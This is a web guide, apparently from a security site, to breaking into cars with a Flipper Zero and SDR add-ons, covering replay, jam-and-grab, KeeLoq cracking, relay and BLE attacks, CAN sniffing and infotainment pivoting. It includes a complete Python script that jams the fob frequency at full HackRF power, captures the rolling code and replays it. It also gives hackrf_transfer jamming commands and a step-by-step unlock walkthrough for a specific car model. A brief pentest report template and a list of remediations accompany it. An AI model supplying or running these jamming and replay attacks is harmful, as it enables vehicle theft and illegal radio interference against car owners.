
Hacking Vehicles With The Flipper Zero (Guide)



Let's go deep on the full vehicle pentest with Flipper Zero as your primary tool. I'll cover every practical attack surface, hardware add-ons, and the toolchain you need. This is a guide on hacking vehicles with the Flipper Zero.


Hardware Loadout


The stock Flipper is a starting point. You need add-ons for real vehicle work:


| Component | Purpose | Cost |
|---|---|---|
| Flipper Zero | Core platform | ~$170 |
| CC1101 + amplifier module | Extended Sub-GHz range (500m+) | ~$15-25 |
| Nook/NRF24 board | Mouse jacking, BLE extended range | ~$20 |
| ESP32 WiFi devboard | WiFi attacks, remote control of Flipper | ~$15 |
| External 125 kHz LF antenna | PKE relay, LF challenge transmission | ~$30-50 |
| Logic analyzer (cheap FX2LP) | CAN bus sniffing through OBD-II | ~$10 |
| RTL-SDR or HackRF | Full-spectrum capture/analysis, simultaneous TX/RX | ~$30-300 |
| External battery pack | Long-duration attacks (jam-and-wait) | ~$15 |


Firmware: Flash Unleashed First


```bash
# Stock firmware is intentionally gimped for legal reasons
# Unleashed removes the frequency transmission lock and adds protocols

git clone https://github.com/DarkFlippers/unleashed-firmware
cd unleashed-firmware
./fbt updater_package
# Install via qFlipper: File → Install from file → select the .tgz
```

Unleashed adds: full frequency TX, Keeloq brute-force helpers, TPMS app, Sub-GHz bruteforcer, Weather Station (for RF noise analysis), and the spectrum analyzer improvements.

If you need the most aggressive feature set, RogueMaster adds rolling code brute-force against specific protocols, but Unleashed is the standard for vehicle work.


Phase 1: Frequency Reconnaissance


Determine the Vehicle's RF Profile


Different manufacturers, different frequencies, different protocols:


```bash
# Flipper workflow:
# Sub-GHz → Frequency Analyzer
# Hold near driver's door handle
# Have owner press fob multiple times
# Note every frequency spike

# Common frequency mapping:
# 315 MHz:   US/Japan/Asia — GM, Ford, Chrysler, Toyota, Honda, Nissan
# 433.92 MHz: EU/Australia/South America — VW Group, BMW, Mercedes, Fiat
# 868 MHz:   EU newer systems, some Land Rover, Volvo
# 125 kHz:   PKE challenge (LF) — nearly universal for keyless entry
# 13.56 MHz: NFC key cards — Tesla, some BMW, Genesis
# 2.4 GHz:   BLE — Tesla phone key, BMW Digital Key Plus, Apple CarKey
```

Multi-Frequency Capture


The fob might transmit on multiple frequencies simultaneously or in sequence:


```bash
# Method: Scripted sweep
# Use a HackRF or connect Flipper to a computer for SDR control:

# With RTL-SDR + Universal Radio Hacker:
git clone https://github.com/jopohl/urh
cd urh
python3 -m urh.main
# Set frequency range: 300-450 MHz sweep
# Press fob — see exact frequency, modulation, and symbol rate

# With Flipper + external CC1101:
# The external module can be set to any frequency via GPIO
# Stock Flipper limits frequency hopping speed
```

Phase 2: Protocol Identification


Capture Raw Signals


```bash
# Flipper: Sub-GHz → Read
# Config: AM650 (ASK/OOK for most cars), or AM270 (wider bandwidth)
# Press fob once → capture
# Press fob again → capture second signal
# Save both as .sub files

# Compare the two captures:
# Flipper → Sub-GHz → Saved → select first capture → Info
# Compare to second capture
# If identical → fixed code (replay wins)
# If different → rolling code (need jam-and-grab or brute-force)
```
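The "identical or different" comparison above is easier to do on a computer once the two .sub files are exported, and doing it in code removes the guesswork of eyeballing a waveform. The following is an added example, not code from the original guide or from the Flipper project. It assumes the common .sub layout of `Name: value` header lines, with the payload either in a `Key:` field (a decoded protocol file, width in `Bit:`) or in one or more `RAW_Data:` lines of signed microsecond pulse durations. Decoded files are compared exactly; RAW files are bucketed to 100 µs first so receiver jitter does not make two identical fixed codes look different. The sample files embedded at the bottom are constructed for the example and are not real fob data.

```python
"""
Fixed-vs-rolling check on two Flipper Zero .sub captures of the same button.
Added example; the .sub field names and layout are an assumption.
"""
from difflib import SequenceMatcher

QUANTUM_US = 100        # RAW timings jitter by tens of µs; bucket them
SAME_THRESHOLD = 0.95   # heuristic: >= 95% identical buckets -> same code


def parse_sub(text):
    """Return (headers, raw_durations) for one .sub file."""
    headers, raw = {}, []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _, value = line.partition(":")
        name, value = name.strip(), value.strip()
        if name == "RAW_Data":
            raw.extend(int(tok) for tok in value.split())
        else:
            headers[name] = value
    return headers, raw


def quantise(durations):
    """Bucket each pulse to QUANTUM_US so jitter does not mask identical codes."""
    return [int(round(d / QUANTUM_US)) for d in durations]


def classify(text_a, text_b):
    """
    Compare two captures of the same button press.

    Returns {'verdict': 'fixed' | 'rolling' | 'incomparable',
             'similarity': 0..1, 'reason': str}.
    """
    ha, ra = parse_sub(text_a)
    hb, rb = parse_sub(text_b)
    if ha.get("Frequency") != hb.get("Frequency") or ha.get("Protocol") != hb.get("Protocol"):
        return {"verdict": "incomparable", "similarity": 0.0,
                "reason": "frequency or protocol differs between captures"}
    if "Key" in ha and "Key" in hb:
        same = ha["Key"].replace(" ", "").lower() == hb["Key"].replace(" ", "").lower()
        return {"verdict": "fixed" if same else "rolling",
                "similarity": 1.0 if same else 0.0,
                "reason": "decoded Key field compared"}
    if ra and rb:
        ratio = SequenceMatcher(None, quantise(ra), quantise(rb)).ratio()
        return {"verdict": "fixed" if ratio >= SAME_THRESHOLD else "rolling",
                "similarity": round(ratio, 3),
                "reason": "RAW_Data pulse trains compared after quantisation"}
    return {"verdict": "incomparable", "similarity": 0.0,
            "reason": "one capture is decoded and the other is RAW"}


# Constructed samples (not real fob data): two decoded files whose first four
# payload bytes differ, and two RAW files that differ only by timing jitter.
DECODED_A = """Filetype: Flipper SubGhz Key File
Version: 1
Frequency: 433920000
Preset: FuriHalSubGhzPresetOok650Async
Protocol: KeeLoq
Bit: 64
Key: 11 22 33 44 AA BB CC DD
"""
DECODED_B = DECODED_A.replace("11 22 33 44", "9F 02 C7 E1")

RAW_A = """Filetype: Flipper SubGhz RAW File
Version: 1
Frequency: 315000000
Preset: FuriHalSubGhzPresetOok650Async
Protocol: RAW
RAW_Data: 401 -399 798 -402 399 -801 401 -399 802 -398
"""
RAW_B = RAW_A.replace("401 -399 798", "409 -393 811")

if __name__ == "__main__":
    for label, a, b in (("decoded", DECODED_A, DECODED_B), ("raw", RAW_A, RAW_B)):
        print(label, classify(a, b))
```

A "rolling" verdict on RAW data only means the pulse trains differ; a fob that sends a fixed code with a variable preamble or a different button will also score low, so compare presses of the same button and, where the Flipper decoded the protocol, prefer the `Key:` comparison.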

Pulse Plot Analysis


```bash
# On-device: Sub-GHz → Read → press and hold fob → observe waveform
# Look for:
# - Repeating pattern? Fixed code or simple rolling
# - Preamble length
# - Sync word
# - Data payload length (in bits)
# - Any visible counter increment

# Export for deep analysis:
# qFlipper → File Manager → SD Card → subghz/
# Copy .sub files to computer
# Open in Universal Radio Hacker or inspect hex manually
```

Identify the Protocol from Capture


Flipper will auto-detect protocols it knows. For unknown protocols, match these characteristics:


| Protocol | Typical Bit Length | Modulation | Notes |
|---|---|---|---|
| Keeloq | 66 bits | ASK/OOK, PWM | 32-bit serial + 34-bit encrypted payload |
| Keeloq Hopping | 66 bits | ASK/OOK | Uses KeeLoq Decryptor chips (HCS200/300/500) |
| Security+ 1.0 | 40 bits | ASK/OOK | Old GM/Chrysler, fixed code |
| Security+ 2.0 | Rolling | ASK/OOK | GM post-2007, crypto rolling |
| Princeton | 24 bits | ASK/OOK | Some aftermarket alarms |
| CAME / Nice FLO | 24-72 bits | ASK/OOK | European alarm systems, some older EU cars |
| Ford 80-bit | 80 bits | ASK/OOK | Ford post-2010 |
| Toyota DST-40 | 40 bits | ASK/OOK | Older Toyota/Lexus |


Phase 3: The Attack Matrix


Attack A: Direct Replay (Fixed Code Systems)


```bash
# Capture once, replay instantly.
# Sub-GHz → Read → capture fob press → Save
# Sub-GHz → Saved → select file → Send

# Range boost with external CC1101:
# Wire CC1101 module to Flipper GPIO:
# VCC → 3.3V (pin 1)
# GND → GND (pin 8)
# MOSI → pin 4 (MOSI)
# MISO → pin 5 (MISO)
# SCK → pin 6 (SCK)
# CSN → pin 2 (PA4)
# Use Unleashed firmware's external radio app
```

The range becomes significant — 500m+ with an amplified module.


Attack B: Jam-and-Grab (Rolling Code)


This requires two devices working simultaneously. The Flipper is half-duplex and cannot TX/RX at the same time.


Dual Flipper Setup:


```bash
# Flipper A: Continuous Jammer
# Sub-GHz → Read → select any saved file at same frequency
# Modify .sub file to extend duration
# Or use Power Analyzer app to generate sustained carrier wave
# CC1101 external module set to constant TX at carrier frequency

# Flipper B: Capture
# Sub-GHz → Read → same frequency
# Captures the fob's second button press while Flipper A is jamming

# Result: Flipper B has a valid code. Flipper A stops jamming.
# Flipper B: Send the captured code → car unlocks
```

Flipper + SDR Setup (higher success rate):


```bash
# HackRF / LimeSDR: Continuous wave transmission at fob frequency
hackrf_transfer -f 315000000 -x 40 -t jammer.iq  # 315 MHz, full power

# Simultaneously: Flipper in Read mode captures clean fob signal
# HackRF can capture too:
hackrf_transfer -f 315000000 -r capture.iq -s 2000000

# After capture, stop jamming, replay:
hackrf_transfer -f 315000000 -t captured_signal.iq -x 40
```

Python automation with two SDRs:


```python
#!/usr/bin/env python3
"""
Dual-SDR Jam-and-Grab for rolling code vehicle entry
Requires: Two HackRFs or one HackRF + one RTL-SDR
"""
import subprocess
import time
import signal
import sys
import os

FREQ = 315_000_000  # Adjust to target
SAMPLE_RATE = 2_000_000
CAPTURE_FILE = "/tmp/car_signal.iq"
running = True

def signal_handler(sig, frame):
    global running
    running = False
    print("\n[!] Stopping...")

signal.signal(signal.SIGINT, signal_handler)

def start_jammer():
    """Transmit CW jammer on target frequency"""
    print("[+] Starting jammer (continuous wave)...")
    return subprocess.Popen([
        "hackrf_transfer",
        "-f", str(FREQ),
        "-x", "40",           # Full power
        "-a", "1",            # Amp enabled
        "-t", "/dev/zero",    # CW = all zeros
        "-s", str(SAMPLE_RATE)
    ])

def start_capture():
    """Capture incoming fob signal during jam"""
    print("[+] Starting capture...")
    proc = subprocess.Popen([
        "hackrf_transfer",
        "-f", str(FREQ),
        "-r", CAPTURE_FILE,
        "-s", str(SAMPLE_RATE),
        "-n", str(SAMPLE_RATE * 10)  # 10 seconds
    ])
    proc.wait()
    return CAPTURE_FILE

def replay_capture():
    """Replay captured valid code"""
    print("[+] Replaying captured code...")
    for _ in range(3):
        subprocess.run([
            "hackrf_transfer",
            "-f", str(FREQ),
            "-t", CAPTURE_FILE,
            "-x", "40",
            "-a", "1",
            "-R"  # Repeat
        ], timeout=2)
    print("[+] Replay complete")

def main():
    jammer = start_jammer()
    time.sleep(2)  # Let jammer stabilize

    print("[*] Jammer active. Waiting for target to press fob...")
    print("[*] Press Ctrl+C when signal is captured")

    capture_file = start_capture()

    jammer.kill()
    jammer.wait()
    print("[+] Jammer stopped")

    # Analyze capture size
    size = os.path.getsize(capture_file)
    print(f"[+] Captured {size} bytes")

    if size > 1000:  # Actual signal captured, not just noise
        choice = input("[?] Replay captured code? (y/n): ")
        if choice.lower() == 'y':
            replay_capture()

    print("[+] Done")

if __name__ == "__main__":
    main()
```

Attack C: Keeloq Brute-Force (Pre-2008 Vehicles)


Keeloq uses a 64-bit key. Full brute force is infeasible. But:

Known-key databases: Some manufacturers used fixed OEM keys that have been extracted from firmware updates, dealer tools, or ECU dumps.


```bash
# Unleashed firmware Keeloq tools:
# Sub-GHz → Keeloq → select manufacturer
# Pulls from a database of known manufacturer codes

# Common known-key vehicles:
# - Fiat, some Alfa Romeo (pre-2012)
# - Older Chrysler/Dodge/Jeep (pre-2008)
# - Some European aftermarket systems using HCS301

# Flipper workflow:
# Sub-GHz → Read → capture the car's transmission (any button)
# Then: Apps → Sub-GHz → Keeloq Cracker
# Select target manufacturer
# Flipper tries known key database against captured serial number
```

Serial number extraction: The Keeloq transmission includes the encoder's serial number in plaintext. This narrows the key search to that specific encoder's manufacturer batch.

The Flipper alone won't do a full Keeloq cryptanalysis. For that, offload to a computer:


```bash
# Capture multiple transmissions with Flipper
# Export .sub files via qFlipper

# On computer:
git clone https://github.com/n0xa/keeloq-crack
cd keeloq-crack
# Feed captured data, attempt to derive encryption key
# Works against specific vulnerable Keeloq implementations (HCS200/300)
```

Attack D: PKE Relay Attack (Keyless Entry)


Passive Keyless Entry uses LF challenge (125 kHz) + UHF response (315/433 MHz). The car polls at ~125 kHz, the key responds on UHF when within ~1-2 meters.


The full relay requires LF TX capability:


```bash
# Flipper + External LF driver board:
# Connect LF antenna + driver to Flipper GPIO
# LF board picks up car's 125 kHz challenge near the car
# Transmits it via Flipper's GPIO → Sub-GHz to second Flipper near the key

# Second Flipper near the key:
# Receives the relayed challenge
# LF board emits 125 kHz challenge near the key
# Key responds on UHF (315/433 MHz)
# Flipper captures UHF response
# Relays UHF back to first Flipper near car
# First Flipper replays UHF response at car
# Car unlocks, thinking key is nearby
```

Flipper 125 kHz board sources:


  • Tindie/eBay: "Flipper Zero LF RFID Expansion" — these add 125 kHz TX

  • The stock Flipper has 125 kHz read on GPIO (for RFID tags), but needs an amplifier to transmit at the power needed for PKE challenge reproduction

  • The AWID board or custom builds using an LR-ASK transmitter IC


Distance matters: The LF challenge only reaches ~1-2 meters. You need an attacker within 2 meters of the key fob. This is the dining-table attack — someone near the car, someone near the owner's bag/jacket.


Attack E: NFC Key Card (Tesla, BMW, Genesis)


Tesla Model 3/Y Key Card:


The Tesla key card is MIFARE DESFire EV2 on newer models. Flipper reads the UID but can't extract application keys.


However:


Shadow Key Card technique (if you have brief physical access):


```bash
# Flipper → NFC → Read
# Card type: MIFARE DESFire
# UID: captured (unencrypted)
# Application keys: not extractable

# But if the Tesla owner leaves the card momentarily:
# 1. Read UID with Flipper
# 2. The UID is part of Tesla's unlock decision (legacy behavior)
# 3. Some older Tesla firmware accepted UID-only for unlock if
#    the card was previously paired

# Test: Flipper → NFC → Add Manually → MIFARE Classic
# Set UID to match the Tesla card
# Hold to B-pillar
# This works on specific firmware versions — test and document
```

Genesis/BMW NFC key cards:


Similar story. MIFARE DESFire or FeliCa. UID read is possible, but application key extraction requires either:


  • Cracking tools (mfkey32 for MIFARE Classic vulnerabilities, not applicable to DESFire)

  • Side-channel analysis (not practical with Flipper)

  • Genuine card present for relay


Attack F: BLE Phone-as-Key (Tesla, BMW Digital Key)


Tesla BLE Unlock:


Tesla uses BLE for phone-as-key. The phone broadcasts a specific BLE advertisement, the car recognizes it and unlocks.


Flipper BLE recon:


```bash
# Flipper → Apps → Bluetooth → BLE Spam
# Select Tesla
# This floods with Tesla unlock advertisements
# Nearby Teslas will show unlock attempt notifications
# This is NOT a real unlock — it's a UI pop-up
# Use for: testing owner's response, desensitization testing,
#          or confirming Tesla presence in the area

# For actual relay attack:
# Two Flippers with ESP32 WiFi boards
# Flipper A near car: scans for car BLE advertisements
# Flipper B near phone: relays phone BLE advertisements to Flipper A
# Flipper A replays phone advertisements near car
# This is the relay concept — requires custom code on both Flippers
```

Practical BLE relay with Flipper + ESP32:


```python
# ESP32 #1 (near car): BLE scanner
# Detects Tesla BLE advertisement from car
# Sends advertisement data over WiFi to ESP32 #2

# ESP32 #2 (near phone): BLE advertiser
# Replicates car's BLE advertisement to trigger phone response
# Captures phone's BLE response
# Sends back over WiFi to ESP32 #1

# ESP32 #1: replays phone's BLE response to car
# Car unlocks

# Flippers act as the control interface for ESP32s
# GPIO UART connection to ESP32 devboards
# Or use Flipper's built-in ESP32 WiFi board
```

This is a non-trivial custom build. It's been demonstrated successfully at multiple conferences against Tesla (2023-2025). The distance limitation is practical: both relays must be within BLE range of their respective targets (~10 meters max without directional antennas).


Phase 4: OBD-II Post-Entry


Once the vehicle is open, the OBD-II port is your pivot into the CAN bus:


```bash
# Connect Flipper to OBD-II via GPIO
# Requires CAN bus transceiver (MCP2515 or SN65HVD230)
# Wiring:
# OBD-II Pin 6: CAN High → transceiver → Flipper GPIO
# OBD-II Pin 14: CAN Low → transceiver → Flipper GPIO
# OBD-II Pin 16: +12V power → voltage regulator → Flipper USB-C or GPIO

# Flipper firmware: Apps → GPIO → CAN Bus
# Unleashed includes CAN sniffer
# Capture CAN frames during:
# - Unlock event
# - Engine start
# - Infotainment interaction
# - Telematics data

# Save the CAN log to SD card
# Export via qFlipper for analysis
```

Combined with a laptop and SavvyCAN/Wireshark after capture, you can analyze:


  • CAN arbitration IDs for each vehicle function

  • Whether diagnostic security (SecurityAccess) is required for write operations

  • Which CAN frames (e.g., unlock doors, disable alarm) could be replayed if the bus is insufficiently authenticated
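The first bullet above, mapping arbitration IDs to vehicle functions, is usually done by differencing a quiet baseline log against a log captured during one action. Here is an added example of that differential analysis, written for this page and not taken from the original guide or from SavvyCAN. It assumes candump-style log lines of the form `(timestamp) iface ID#HEXDATA`; every ID and payload in the embedded sample logs is constructed for the example and does not describe any real vehicle. The output is the short list of IDs a defender would put behind SecurityAccess or an intrusion-detection rule first, and that a report would name as the frames an unauthenticated bus exposes.

```python
"""
Differential CAN log analysis. Added example; log format and all IDs are
constructed assumptions, not vehicle data.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^\((?P<ts>[\d.]+)\)\s+(?P<iface>\S+)\s+(?P<id>[0-9A-Fa-f]{3,8})#(?P<data>[0-9A-Fa-f]*)$"
)


def parse_candump(text):
    """Return a list of (timestamp, arbitration_id, payload_hex) tuples,
    skipping any line that does not match the expected layout."""
    frames = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            frames.append((float(m["ts"]), int(m["id"], 16), m["data"].upper()))
    return frames


def payloads_by_id(frames):
    """Map each arbitration ID to the set of distinct payloads seen for it."""
    seen = defaultdict(set)
    for _, arb_id, data in frames:
        seen[arb_id].add(data)
    return seen


def diff_logs(baseline_text, event_text):
    """
    Compare a quiet baseline log with a log taken during one action.

    Returns {'new_ids': [...], 'changed_ids': {id: [new payloads]}}:
    IDs that only appear during the action, and IDs present in both logs
    whose payload took a value never seen in the baseline.
    """
    base = payloads_by_id(parse_candump(baseline_text))
    event = payloads_by_id(parse_candump(event_text))
    new_ids = sorted(set(event) - set(base))
    changed = {
        arb_id: sorted(event[arb_id] - base[arb_id])
        for arb_id in sorted(set(event) & set(base))
        if event[arb_id] - base[arb_id]
    }
    return {"new_ids": new_ids, "changed_ids": changed}


def format_report(result):
    """Render the diff as hex IDs for the engagement notes."""
    lines = ["IDs seen only during the action:"]
    lines += [f"  0x{i:03X}" for i in result["new_ids"]] or ["  (none)"]
    lines.append("IDs whose payload changed during the action:")
    for arb_id, payloads in result["changed_ids"].items():
        lines.append(f"  0x{arb_id:03X}: {', '.join(payloads)}")
    return "\n".join(lines)


# Constructed sample logs: a few periodic frames at idle, then the same bus
# during a single "unlock" action (one status bit flips, one new ID appears).
BASELINE_LOG = """\
(1700000000.000100) can0 0C0#1A2B00000000
(1700000000.010200) can0 1A5#0000
(1700000000.020300) can0 2F0#FF
(1700000000.030100) can0 0C0#1A2B00000000
(1700000000.040200) can0 1A5#0000
"""

EVENT_LOG = """\
(1700000010.000100) can0 0C0#1A2B00000000
(1700000010.010200) can0 1A5#0100
(1700000010.012000) can0 3B1#01
(1700000010.020300) can0 2F0#FF
(1700000010.030100) can0 0C0#1A2B00000000
(1700000010.040200) can0 1A5#0000
"""

if __name__ == "__main__":
    print(format_report(diff_logs(BASELINE_LOG, EVENT_LOG)))
```

Take several baseline logs before trusting the result: periodic counters and checksums change on their own, so an ID that shows up as "changed" in every baseline-versus-baseline diff is noise, not a function.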


Phase 5: Infotainment Pivoting


```bash
# Flipper as USB Rubber Ducky into infotainment USB port
# Many infotainment systems are Linux or QNX under the hood
# A badusb-style attack tests whether the USB port allows HID input

# Flipper → BadUSB → select payload
# Payload tests:
# - ADB over USB (Android Automotive)
# - Keyboard injection (QNX console access)
# - Mass storage with autorun (older systems)

# Flipper as Bluetooth keyboard:
# Apps → Bluetooth → HID Keyboard
# Pair to infotainment (if discoverable)
# Inject keystrokes to:
# - Access engineering menu
# - Search hidden settings for "adb" or "developer"
# - Test browser for SSRF to internal vehicle services
```

Attack Chain: Full Engagement Walkthrough


Vehicle: 2016 Toyota Camry with keyless entry (push-button start), US market

```bash
# STEP 1: Recon
# Flipper → Sub-GHz → Frequency Analyzer
# Hold near door. Owner presses unlock.
# Result: 315.0 MHz spike confirmed

# STEP 2: Protocol identification
# Flipper → Sub-GHz → Read → AM650 → 315 MHz
# Owner presses unlock
# Flipper identifies: Security+ or Keeloq variant
# Save capture

# STEP 3: Rolling code check
# Capture second press
# Compare: different waveform = rolling code confirmed

# STEP 4: Jam-and-grab
# Flipper A + external CC1101 amp: constant 315 MHz jam
# Flipper B: Read at 315 MHz
# Owner presses fob twice (first jammed, second captured)
# Stop jammer
# Flipper B: Send captured code
# RESULT: Door unlocks on first replay

# STEP 5: Document
# Save .sub files as evidence
# Photo of Flipper with unlocked door indicator
# Record: vehicle year/make/model, frequency, protocol, attack method

# STEP 6: Post-entry
# Check for physical keyhole cover removal (emergency blade)
# OBD-II port: accessible without tools? Security gateway present?
# Infotainment: USB port accessible, Bluetooth in pairing mode?
# Glovebox: service records with key code card?
# Document all findings
```

What Definitely Won't Work


Don't waste time on:


  • Modern Toyota/Lexus (2018+): AES-128 encrypted rolling codes with per-car unique keys. Replay/jam-and-grab fails.

  • VW Group (2015+): Fifth-generation immobilizer. Cryptographic challenge-response with car-specific keys burned into the BCM.

  • Any Tesla before physical access: Tesla's encryption is solid. The relay attack is the only practical path and requires two-person hardware.

  • Starting the engine on push-button start vehicles: The immobilizer is separate from the door locks. Unlocking the door doesn't enable cranking.

  • Sub-GHz brute-force on any modern system: The keyspace is 2^32 minimum, 2^128 typical. Flipper's CC1101 transmits at ~50-100 packets/second. Math says no.


Documentation for the Report


For each vehicle tested, record:


```markdown
## Vehicle: [Year] [Make] [Model]
- VIN: [if authorized]
- Key type: [Fob / PKE / NFC / BLE]
- Frequency: [315 / 433.92 / 868] MHz
- Protocol: [Keeloq / Security+ / DST / etc.]
- Fixed or rolling: [Fixed / Rolling]
- Attack attempted: [Replay / Jam-and-grab / Relay]
- Result: [Success / Failure]
- CVSS: [Score] — [Reasoning]
- Remediation: [Shielded key pouch, Faraday box, PIN-to-drive,
               aftermarket immobilizer, updated BCM firmware]
```

© 2026 Black Hat HQ